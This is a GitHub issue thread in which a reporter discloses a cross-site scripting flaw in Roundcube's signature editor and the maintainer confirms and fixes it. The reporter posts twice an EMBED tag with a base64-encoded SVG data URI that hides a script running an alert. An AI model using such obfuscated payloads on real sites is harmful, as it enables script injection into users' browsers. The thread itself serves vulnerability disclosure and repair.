### ISSUE TITLE
Roundcube Cross-Site Scripting

### ISSUE THREAD

**Issue by muslum** [roundcube/roundcubemail#7507]
![xss](https://user-images.githubusercontent.com/5420497/88437732-c4372100-ce0f-11ea-997a-d1b5f664b68f.png)

Examples page :
         -- http://localhost.com/cpsess5903914110/3rdparty/roundcube/?_task=settings&_action=identities
         - -ADD SIGNATURE HTML
         -- Select source code
         -- Payload is entered in the name field
         -- saving and running
Payload : 
        -- <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH   A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

Mail : cybersecurity@muslumdag.com

**Comment by alecpl** [comment]
It would be XSS if a 3rd party could do this. What payload? A `<script>` or something more sophisticated?

**Comment by muslum** [comment]
Payload :   
          <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH   A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED>

**Comment by muslum** [comment]
Check from here : https://cxsecurity.com/issue/WLB-2020010153

**Comment by alecpl** [comment]
So, this is `<embed>` with insecure `src=data:image/svg+xm,...l`. I confirm this in release-1.4, but not in git-master. I'll see if there's some easy fix for 1.4 possible.

As this works only with a content inserted by the user itself, I'm not even sure we can call it a security issue.

**Comment by alecpl** [comment]
It does not happen in the mail compose editor, probably because `media` plugin is enabled there. It looks that we could set `invalid_elements: 'embed'` to prevent that issue in the signature editor.

**Comment by muslum** [comment]
It's not too dangerous for you from now on, but no one knows what might happen. 😅
Just thought there might be benefit in reporting...

**Comment by alecpl** [comment]
Fixed.
